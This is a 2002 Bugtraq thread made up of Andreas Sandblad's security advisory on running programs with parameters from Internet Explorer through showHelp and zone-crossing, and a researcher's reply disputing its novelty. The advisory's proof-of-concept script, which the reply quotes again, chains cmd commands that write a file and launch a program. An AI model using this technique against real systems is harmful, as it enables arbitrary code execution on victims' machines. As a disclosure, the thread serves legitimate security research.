From sandblad@acc.umu.se Sat Nov 9 11:48:59 2002 From: Andreas Sandblad To: bugtraq@securityfocus.com Date: Wed, 6 Nov 2002 20:48:03 +0100 (CET) Subject: How to execute programs with parameters in IE - Sandblad advisory #10 - Sandblad advisory #10 - ---------------------------------------------------------------- Title: "How to execute programs with parameters in IE" Date: [2002-11-06] Software: Internet Explorer (webbrowser control) Vendor: http://www.microsoft.com/ Impact: Javascript in "Internet zone" may execute programs with parameters _ _ o' \,=./ `o Author: Andreas Sandblad, sandblad@acc.umu.se (o o) ---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo--- TABLE OF CONTENTS: ================== Introduction ................................................. 1 Vendor status ................................................ 2 Details ...................................................... 3 Exploit ...................................................... 4 Disclaimer ................................................... 5 Feedback ..................................................... 6 (1) INTRODUCTION: ================= By default all internet contents such as homepages are placed in the "Internet zone". Local content viewed in IE runs in the "Local computer zone" with less restrictions. In the past we have seen many vulnerabilities where script in the "Internet zone" could access the "Local computer zone". The script could do actions like: - Read local files if the exact path is known and file can be opened by IE. - Execute local programs (exact path required) WITHOUT parameters using the codebase attack. It will be shown in this document how script in the "Local computer zone" can actually be designed to run arbitrary programs WITH parameters (exact path not needed). The technique used may open up far more dangerous attacks than seen before. (2) VENDOR STATUS: ================== Microsoft was initially contacted 2002-10-04. After several mail exchanges, their final response were that the technique used to run programs with parameters from the "Local computer zone" was no security vulnerability. A fix should instead be applied for all possibilities for content in the "Internet zone" to access the "Local computer zone". (3) DETAILS: ============ Javascript can use the showHelp command to do one of the following two operations: 1. Open a local compiled help file (.chm) in a separate winhelp window. 2. Open an url (must begin with http://) in a separate winhelp window. Script in window opened as (1) may use the shortcut command (activeX control) to run programs with parameters, but (2) may not. Nothing strange, normal security restrictions. After some investigations I found a way to make (2) use the shortcut command. The following must be done: 3. Script in (2) gets access to the "Local computer zone". 4. Script in (2) changes url to "mk:@MSITStore:C:" or similiar. 5. A local compiled help file must have been opened since IE was first started. Any help file will do. For example showHelp("iexplore.chm"). In order to achieve (3) there are several nonpatched "cross site/zone scripting" vulnerabilites to use. To achieve (4) a new window must be created from (2). By using the "opener" object it is possible to keep control of the winhelp window (2) even after the url is changed. (5) is trivial to achieve and will not affect the winhelp window for (2), since it is opened in a different window by default. Before MS02-055 was released by Microsoft the above were a lot more easier to perform. (3) and (4) could then be skipped. (4) EXPLOIT: ============ The exploit uses a nonpatched "cross site/zone scripting" vulnerability published by Liu Die Yu 2002-10-01 to Bugtraq: http://online.securityfocus.com/archive/1/293692 It could also be possible to use one of the many "cross site/zone scripting" vulnerabilities Greymagic found: http://sec.greymagic.com/adv/gm012-ie/ Recently I reported a new "cross site/zone scripting" vulnerability to Microsoft that could also be used. But since no patch is yet produced, information about it will not be published. In order for not having to put script in 3 separate files I have combined them into one single file. The script will check for text after the # sign in the url to determine what to perform (url's hash). If your computer is heavily loaded, then the value of the setTimeout timer has to be increased. The timer is needed because the "mk:@MSITStore:C:" url is not set directly by IE. INSTRUCTIONS: 1. Copy the content below and place it in a html file. 2. REMOVE THE * FROM THE SCRIPT TAG. 3. Place the file on a remote webserver and load it in IE (URL MUST START WITH HTTP://). 4. The script will open up a dos window and display a line of text, create the file c:/vulnerable.txt (write permission required) and start winmine (this excellent game must exist). The help window for IE will not be closed. TESTED: Win2000 pro, XP, IE 6 (latest patches). --------------------------- CUT HERE --------------------------- <*script> // "How to execute programs with parameters in IE", 2002-11-06 // Sandblad advisory #10, Andreas Sandblad, sandblad@acc.umu.se prog = 'cmd'; args = '/k echo You are vulnerable (Sandblad #10) & '+ 'echo Sandblad #10 > c:/vulnerable.txt & winmine'; if (!location.hash) { showHelp(location+"#1"); showHelp("iexplore.chm"); blur(); } else if (location.hash == "#1") open(location+"2").blur(); else { f = opener.location.assign; opener.location="res:"; f("javascript:location.replace('mk:@MSITStore:C:')"); setTimeout('run()',1000); } function run() { f("javascript:document.write('')"); f("javascript:c1.Click();c2.Click();"); close(); } --------------------------- CUT HERE --------------------------- (5) Disclaimer: =============== Andreas Sandblad is not responsible for the misuse of the information provided in this advisory. The opinions expressed are my own and not of any company. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this advisory. Any use of the information is at the user's own risk. (6) Feedback: ============= Please send suggestions and comments to: _ _ sandblad@acc.umu.se o' \,=./ `o (o o) ---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo--- Andreas Sandblad, student in Engineering Physics and Computing Science at Umea University, Sweden. -/---/---/---/---/---/---/---/---/---/---/---/---/---/---/---/-- From thor@pivx.com Sat Nov 9 11:56:08 2002 From: Thor Larholm To: bugtraq@securityfocus.com, Andreas Sandblad Date: Thu, 7 Nov 2002 10:53:28 +0100 Subject: RE: How to execute programs with parameters in IE - Sandblad advisory #10 [ The following text is in the "iso-8859-1" character set. ] [ Your display is set for the "US-ASCII" character set. ] [ Some characters may be displayed incorrectly. ] Unless I am missing something, this is definitely not a vulnerability in itself but just a practical demonstration of the "assign method caching" vulnerability. Executing programs with or without parameters also become pointless once you have complete access to a local security zone (in this case, given by the "assign method caching" vuln), as demonstrated by http-equiv quite some times. Circumventing the zone barriers allow you to (among others) retrieve the location of that funny malware you just planted in the users temporary internet files, and subsequently execute it. The HTMLHelp Control used in this example only has the authority to execute commands at all because it is being used from a local security zone. As such, when Microsoft are claiming that "the technique used to run programs with parameters from the "Local computer zone" was no security vulnerability", they are in my opinion correct. Despite this, it is always interesting to have more approaches to program execution for demonstratory purposes once you get your foot inside the door of a local security zone, especially since the "codebase localpath" approach is practically filtered anywhere in its pure form. IE6 SP1 did include some early attempts at preventing any interaction between security zones (specifically from the Internet zone to any local zone). That attempt was broken with the object redirect approach. It will be interesting to see what Microsoft comes up with next to prevent interaction between security zones. Regards Thor Larholm, Security Researcher PivX Solutions, LLC Are You Secure? http://www.PivX.com -----Original Message----- From: Andreas Sandblad [mailto:sandblad@acc.umu.se] Sent: 6. november 2002 20:48 To: bugtraq@securityfocus.com Subject: How to execute programs with parameters in IE - Sandblad advisory #10 --------------------------- CUT HERE --------------------------- <*script> // "How to execute programs with parameters in IE", 2002-11-06 // Sandblad advisory #10, Andreas Sandblad, sandblad@acc.umu.se prog = 'cmd'; args = '/k echo You are vulnerable (Sandblad #10) & '+ 'echo Sandblad #10 > c:/vulnerable.txt & winmine'; if (!location.hash) { showHelp(location+"#1"); showHelp("iexplore.chm"); blur(); } else if (location.hash == "#1") open(location+"2").blur(); else { f = opener.location.assign; opener.location="res:"; f("javascript:location.replace('mk:@MSITStore:C:')"); setTimeout('run()',1000); } function run() { f("javascript:document.write('')"); f("javascript:c1.Click();c2.Click();"); close(); } --------------------------- CUT HERE ---------------------------